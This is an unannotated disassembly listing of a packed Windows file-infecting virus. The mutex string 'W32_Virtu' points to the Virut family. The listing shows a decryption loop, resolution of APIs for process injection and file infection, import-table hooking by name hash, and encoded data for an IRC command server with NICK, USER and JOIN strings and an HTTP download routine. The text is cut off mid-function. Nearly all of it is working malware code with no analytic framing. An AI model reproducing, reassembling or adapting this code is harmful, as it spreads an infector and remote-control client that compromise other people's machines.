cmp dword ptr [eax+3], 636F7250h
jnz short loc_3150B379
cmp dword ptr [eax+7], 72646441h
jnz short loc_3150B379
cmp dword ptr [eax+0Bh], 737365h
jz short loc_3150B37E
loc_3150B379: ; CODE XREF: UPX2:3150B35C�j
; UPX2:3150B365�j ...
loop loc_3150B352
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_3150B37E: ; CODE XREF: UPX2:3150B377�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_3150B3A4+2
inc ebx
insb
outsd
jnb short near ptr loc_3150B402+2
dec eax
popa
outsb
db 64h
insb
loc_3150B3A4: ; CODE XREF: UPX2:3150B395�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_3150B3C0+1
inc ebx
jb short near ptr loc_3150B41B+1
popa
jz short near ptr loc_3150B41B+4
inc ebp
jbe short near ptr loc_3150B421+1
outsb
jz short near ptr loc_3150B3FF+2
loc_3150B3C0: ; CODE XREF: UPX2:3150B3AF�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_3150B3DC
inc edi
db 65h
jz short near ptr loc_3150B41B+4
popa
jnb short loc_3150B44A
inc ebp
jb short near ptr loc_3150B44A+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3150B3DC proc near ; CODE XREF: UPX2:3150B3CA�p
; FUNCTION CHUNK AT 3150B485 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 3150B5C5 SIZE 0000013A BYTES
push ebx
call esi
mov [ebp+403544h], eax
call sub_3150B45A
test eax, eax
jz short loc_3150B40F
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_3150B409
lea eax, [ebp+4011D2h]
loc_3150B3FF: ; CODE XREF: UPX2:3150B3BE�j
mov dl, [eax-1]
loc_3150B402: ; CODE XREF: UPX2:3150B39D�j
call sub_3150B475
jmp short loc_3150B485
; ---------------------------------------------------------------------------
loc_3150B409: ; CODE XREF: sub_3150B3DC+1B�j
; sub_3150B3DC+136�j ...
call dword ptr [ebp+40353Ch]
loc_3150B40F: ; CODE XREF: sub_3150B3DC+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150B439
loc_3150B41B: ; CODE XREF: UPX2:3150B3B5�j
; UPX2:3150B3B8�j ...
lea esi, [ebp+403435h]
loc_3150B421: ; CODE XREF: UPX2:3150B3BB�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_3150B439: ; CODE XREF: sub_3150B3DC+3D�j
pop ebp
retn
sub_3150B3DC endp
; ---------------------------------------------------------------------------
loc_3150B43B: ; CODE XREF: sub_3150B45A+2�p
; sub_3150B3DC:loc_3150B644�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_3150B44A: ; CODE XREF: UPX2:3150B3D4�j
; UPX2:3150B3D7�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
; =============== S U B R O U T I N E =======================================
sub_3150B45A proc near ; CODE XREF: sub_3150B3DC+9�p
xor ecx, ecx
call loc_3150B43B
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_3150B45A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B475 proc near ; CODE XREF: sub_3150B3DC:loc_3150B402�p
; sub_3150D249+25B�p
mov dh, dl
mov ecx, 225Fh
loc_3150B47C: ; CODE XREF: sub_3150B475+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_3150B47C
retn
sub_3150B475 endp
; ---------------------------------------------------------------------------
db 88h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B3DC
loc_3150B485: ; CODE XREF: sub_3150B3DC+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_3150B4AC: ; CODE XREF: sub_3150B3DC+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_3150B4AC
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_3150B83F
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_3150B5C5
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_3150B409
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_3150B3DC
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_3150B409
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_3150B409
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_3150B5B5
jmp loc_3150B409
; =============== S U B R O U T I N E =======================================
sub_3150B5B5 proc near ; CODE XREF: UPX2:3150B5AB�p
; sub_3150B5B5+D�j
push 1
pop ecx
jecxz short locret_3150B5C4
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_3150B5B5
; ---------------------------------------------------------------------------
locret_3150B5C4: ; CODE XREF: sub_3150B5B5+3�j
retn
sub_3150B5B5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B3DC
loc_3150B5C5: ; CODE XREF: sub_3150B3DC+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_3150B409
call near ptr loc_3150B5DC+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3150B5DC: ; CODE XREF: sub_3150B3DC+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_3150B5F9+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_3150B83F
loc_3150B5F9: ; CODE XREF: sub_3150B3DC+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_3150B409
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_3150B644
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_3150B644: ; CODE XREF: sub_3150B3DC+25D�j
call loc_3150B43B
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_3150B689: ; CODE XREF: sub_3150B3DC+2B0�j
lodsb
stosw
loop loc_3150B689
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_3150B409
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_3150B3DC
; ---------------------------------------------------------------------------
db 8Dh
db 95h ;
db 0E0h, 18h, 40h
db 0
db 52h, 0FFh, 95h
db 9Ch ;
db 35h, 40h, 0
db 0E8h ;
db 16h, 2 dup(0)
db 0
aLookupprivileg db 'LookupPrivilegeValueA',0
db 50h
dd 354895FFh, 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah
dd 4035ECh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h
dd 40354Ch, 5656C48Bh, 57565056h, 35D095FFh, 0C4830040h
dd 95FF5710h, 40353Ch, 26A006Ah, 357095FFh, 28B90040h
dd 97000001h, 0C89E12Bh, 0FF575424h, 4035AC95h, 83F63300h
dd 40363CA5h, 57540000h, 35B095FFh, 0C0850040h, 83465C74h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 35A895FFh, 0C0850040h
dd 0E893DC74h, 43Dh, 0E391C933h, 3C853930h, 75004036h
dd 0AEC18128h, 5000000Dh, 51565054h, 0FF535050h, 40356895h
dd 59C08500h, 74FF0F74h, 858F0824h, 40363Ch, 0FFFDACE8h
dd 95FF53FFh, 40353Ch, 0C48198EBh, 128h, 3C95FF57h, 0E9004035h
dd 0FFFFFBE5h, 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3150B83F proc near ; CODE XREF: sub_3150B3DC+100�p
; sub_3150B3DC+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_3150B84A: ; CODE XREF: sub_3150B83F+E�j
lodsb
test al, al
jnz short loc_3150B84A
loop sub_3150B83F
retn
sub_3150B83F endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_3150BBDA proc near ; CODE XREF: UPX2:3150BC81�p
; UPX2:3150BC92�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_3150BBDA endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_3150BCBD
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_3150BCBD
mov ecx, [ebp+401588h]
jecxz short loc_3150BC75
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_3150BC75: ; CODE XREF: UPX2:3150BC67�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_3150BBDA
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_3150BBDA
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_3150BBDA
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_3150BCBD
lea ecx, [edi+23F5h]
call sub_3150BBDA
loc_3150BCBD: ; CODE XREF: UPX2:3150BC27�j
; UPX2:3150BC5F�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_3150BDA2 proc near ; CODE XREF: sub_3150C60D+1B�p
; sub_3150C785+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_3150BDA2 endp
; ---------------------------------------------------------------------------
dw 0E855h
dd 0
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 63955F51h, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 77726B20h, 63756669h
dd 53550A63h, 62205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h
dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h
dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h
dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h
dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h
dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h
dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h
dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h
dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h
dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch
dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h
dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h
dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h
dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h
dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh
dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h
dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h
dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h
dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h
dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 6A0A0D21h, 0ED606EF9h
dd 474FD479h, 486299ADh, 4403752h, 2930C784h, 0E510A614h
dd 1327B1FAh, 7E10A614h, 571A73C1h, 5C3AAB59h, 52C26CCCh
dd 0D8B8B3h, 13h dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3150C557 proc near ; CODE XREF: sub_3150C59E:loc_3150C5FB�p
; sub_3150C65E+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3150C573: ; CODE XREF: sub_3150C557+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3150C595
cmp eax, [edx+8]
jnb short loc_3150C595
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_3150C59A
; ---------------------------------------------------------------------------
loc_3150C595: ; CODE XREF: sub_3150C557+23�j
; sub_3150C557+28�j
add edx, 28h
loop loc_3150C573
loc_3150C59A: ; CODE XREF: sub_3150C557+3C�j
popa
retn 4
sub_3150C557 endp
; =============== S U B R O U T I N E =======================================
sub_3150C59E proc near ; CODE XREF: UPX2:3150C8CA�p
; UPX2:3150C8F0�p
mov [ebp+4022F7h], al
call sub_3150C60D
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3150C5B5: ; CODE XREF: sub_3150C59E+1E�j
cmp [eax], ebx
jz short loc_3150C5C5
add eax, 4
loop loc_3150C5B5
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3150C5C5: ; CODE XREF: sub_3150C59E+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3150C5DF
loc_3150C5CF: ; CODE XREF: sub_3150C59E+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3150C5CF
mov [ebp+402224h], ebx
loc_3150C5DF: ; CODE XREF: sub_3150C59E+2F�j
; sub_3150C60D+34�j
cmp dword ptr [edx], 0
jz short loc_3150C5E9
sub esi, [edx]
add esi, [edx+10h]
loc_3150C5E9: ; CODE XREF: sub_3150C59E+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3150C5F8
push dword ptr [edx]
jmp short loc_3150C5FB
; ---------------------------------------------------------------------------
loc_3150C5F8: ; CODE XREF: sub_3150C59E+54�j
push dword ptr [edx+10h]
loc_3150C5FB: ; CODE XREF: sub_3150C59E+58�j
call sub_3150C557
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3150C59E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150C60D proc near ; CODE XREF: sub_3150C59E+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3150C65E
mov eax, [ebp+40398Eh]
call sub_3150BDA2
call sub_3150C64A
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3150C643
mov [ebp+4022A0h], ebx
jmp short loc_3150C5DF
; ---------------------------------------------------------------------------
loc_3150C643: ; CODE XREF: sub_3150C60D+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3150C60D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150C64A proc near ; CODE XREF: sub_3150C60D+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3150C65E
xor ecx, ecx
retn
sub_3150C64A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150C65E proc near ; CODE XREF: sub_3150C60D+10�p
; sub_3150C64A+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3150C557
add edx, [ebp+4039AAh]
add edx, esi
loc_3150C672: ; CODE XREF: sub_3150C65E+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3150C783
cmp dword ptr [edx+10h], 0
jz locret_3150C783
mov eax, [edx+0Ch]
push eax
call sub_3150C557
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3150C698: ; CODE XREF: sub_3150C65E+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3150C6B8
cmp cl, 2Eh
jz short loc_3150C6A7
loc_3150C6A4: ; CODE XREF: sub_3150C65E+58�j
inc eax
jmp short loc_3150C698
; ---------------------------------------------------------------------------
loc_3150C6A7: ; CODE XREF: sub_3150C65E+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3150C6A4
loc_3150C6B8: ; CODE XREF: sub_3150C65E+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3150C77B
cmp word ptr [eax-2], 3233h
jnz loc_3150C77B
push esi
cmp dword ptr [edx], 0
jnz short loc_3150C6DB
mov ecx, [edx+10h]
jmp short loc_3150C6DD
; ---------------------------------------------------------------------------
loc_3150C6DB: ; CODE XREF: sub_3150C65E+76�j
mov ecx, [edx]
loc_3150C6DD: ; CODE XREF: sub_3150C65E+7B�j
add esi, ecx
push ecx
call sub_3150C557
add esi, [ebp+4039AAh]
loc_3150C6EB: ; CODE XREF: sub_3150C65E+90�j
; sub_3150C65E+117�j
lodsd
test eax, eax
js short loc_3150C6EB
jz loc_3150C77A
push dword ptr [ebp+4039AAh]
push eax
call sub_3150C557
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3150C717: ; CODE XREF: sub_3150C65E+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3150C72E
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3150C717
; ---------------------------------------------------------------------------
loc_3150C72E: ; CODE XREF: sub_3150C65E+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3150C774
cmp ebx, 0DB6E45A8h
jz short loc_3150C774
cmp ebx, 0FFA13B59h
jz short loc_3150C774
cmp ebx, 0ACB522D6h
jz short loc_3150C774
cmp ebx, 0F358E993h
jz short loc_3150C774
cmp ebx, 0F358E97Dh
jz short loc_3150C774
cmp ebx, 0E1253F46h
